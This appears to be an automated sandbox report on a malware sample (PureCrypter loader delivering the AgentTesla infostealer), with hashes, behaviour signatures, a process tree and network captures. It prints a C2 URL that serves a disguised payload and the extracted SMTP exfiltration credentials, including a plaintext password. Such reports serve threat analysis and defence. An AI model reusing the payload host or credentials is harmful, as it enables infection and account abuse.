Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-es
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20221111-es, locale:es-es, os:windows10-2004-x64, system:windows
  • submitted
    10-02-2023 10:50

General

  • Target

    CAIXABAN.exe

  • Size

    72KB

  • MD5

    fe3ab924e1d37874593b376966d5440f

  • SHA1

    9a6e8a32dbdac605421d987022f0bd12ed6fa415

  • SHA256

    c6f61c3603ed074cec9af4cf5b6c4f56ef5d476e4cb06e21e5c1b313128b4e0d

  • SHA512

    68c48f55f875dbd9781df595ffc2812b4e776a90a46d2e4ece114b079e3e0537d461f8da58947c4b9d029dfb5e3d30994861231d8e7280fc807a31e160dade0e

  • SSDEEP

    384:o8SOHLPTDeUzpNGkrdwTXCZB9i3oN6anxOPz0GwJ3TDCYt/9QylTW:o8rLyUfi3yLDTVW

Malware Config

Extracted

Family

purecrypter

C2

http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.humanpower.vn
  • Port:
    587
  • Username:
    sales@humanpower.vn
  • Password:
    xlA}CL.(Jj8C
  • Email To:
    brimax@ventadeasfaltorc-250enlima.pe

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
    "C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944
    • C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
      C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1660

Network

  • US
    DNS
    superbtanzaniasafaris.com
    CAIXABAN.exe
    Remote address:
    8.8.8.8:53
    Request
    superbtanzaniasafaris.com
    IN A
    Response
    superbtanzaniasafaris.com
    IN A
    198.54.116.34
  • US
    GET
    http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp
    CAIXABAN.exe
    Remote address:
    198.54.116.34:80
    Request
    GET /zav/Qtpprpwy.bmp HTTP/1.1
    Host: superbtanzaniasafaris.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    cache-control: public, max-age=31536000
    expires: Sat, 10 Feb 2024 10:51:28 GMT
    content-type: image/bmp
    last-modified: Fri, 10 Feb 2023 06:52:27 GMT
    etag: "ecfb1-63e5e9ab-0;;;"
    accept-ranges: bytes
    content-length: 970673
    date: Fri, 10 Feb 2023 10:51:28 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
  • US
    DNS
    api.ipify.org
    CAIXABAN.exe
    Remote address:
    8.8.8.8:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN CNAME
    api4.ipify.org
    api4.ipify.org
    IN A
    64.185.227.155
    api4.ipify.org
    IN A
    173.231.16.76
    api4.ipify.org
    IN A
    104.237.62.211
  • US
    DNS
    96.108.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    96.108.152.52.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • 198.54.116.34:80
    http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp
    http
    CAIXABAN.exe
    17.2kB
    999.8kB
    371
    717

    HTTP Request

    GET http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp

    HTTP Response

    200
  • 8.238.20.126:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 20.42.72.131:443
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    260 B
    5
  • 8.238.20.126:80
    260 B
    5
  • 8.238.21.126:80
    260 B
    5
  • 52.109.13.62:443
    322 B
    7
  • 64.185.227.155:443
    api.ipify.org
    CAIXABAN.exe
    208 B
    4
  • 40.77.2.164:443
    260 B
    5
  • 67.26.109.254:80
    260 B
    5
  • 52.109.13.62:443
    260 B
    5
  • 8.8.8.8:53
    superbtanzaniasafaris.com
    dns
    CAIXABAN.exe
    71 B
    87 B
    1
    1

    DNS Request

    superbtanzaniasafaris.com

    DNS Response

    198.54.116.34

  • 8.8.8.8:53
    api.ipify.org
    dns
    CAIXABAN.exe
    59 B
    126 B
    1
    1

    DNS Request

    api.ipify.org

    DNS Response

    64.185.227.155
    173.231.16.76
    104.237.62.211

  • 8.8.8.8:53
    96.108.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    96.108.152.52.in-addr.arpa

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CAIXABAN.exe.log

    Filesize

    1KB

    MD5

    fa566c9cc0cdfc2479d186ed2a7d2078

    SHA1

    a4f5bc2d5d055a766b19f095f0a670eeda57c24b

    SHA256

    bccaf63847951e065e8af3714593cdd2f8ecb76b384c1f7c71e3cd89df314960

    SHA512

    ab3efa28f6f90dddde1472a474e26874e21248cc26603acb582ceb419e81165f4dc1044551755635dc6fd89600cbe0f1daec2ccb185fe77c68df16622e53396f

  • memory/1660-152-0x0000000006B80000-0x0000000006BD0000-memory.dmp

    Filesize

    320KB

  • memory/1660-151-0x0000000006B70000-0x0000000006B7A000-memory.dmp

    Filesize

    40KB

  • memory/1660-149-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

  • memory/1944-142-0x00000000058C0000-0x0000000005926000-memory.dmp

    Filesize

    408KB

  • memory/1944-144-0x0000000005EE0000-0x0000000005FE2000-memory.dmp

    Filesize

    1.0MB

  • memory/1944-139-0x0000000005150000-0x0000000005778000-memory.dmp

    Filesize

    6.2MB

  • memory/1944-140-0x0000000004E00000-0x0000000004E82000-memory.dmp

    Filesize

    520KB

  • memory/1944-141-0x0000000005850000-0x00000000058B6000-memory.dmp

    Filesize

    408KB

  • memory/1944-143-0x0000000005830000-0x0000000005840000-memory.dmp

    Filesize

    64KB

  • memory/1944-138-0x0000000002560000-0x0000000002596000-memory.dmp

    Filesize

    216KB

  • memory/1944-145-0x0000000006070000-0x000000000608E000-memory.dmp

    Filesize

    120KB

  • memory/1944-146-0x00000000078B0000-0x0000000007F2A000-memory.dmp

    Filesize

    6.5MB

  • memory/1944-147-0x0000000006570000-0x000000000658A000-memory.dmp

    Filesize

    104KB

  • memory/4872-132-0x0000000000DC0000-0x0000000000DD8000-memory.dmp

    Filesize

    96KB

  • memory/4872-136-0x0000000007480000-0x00000000074A2000-memory.dmp

    Filesize

    136KB

  • memory/4872-135-0x00000000067B0000-0x00000000067F0000-memory.dmp

    Filesize

    256KB

  • memory/4872-134-0x0000000005840000-0x00000000058D2000-memory.dmp

    Filesize

    584KB

  • memory/4872-133-0x0000000005DF0000-0x0000000006394000-memory.dmp

    Filesize

    5.6MB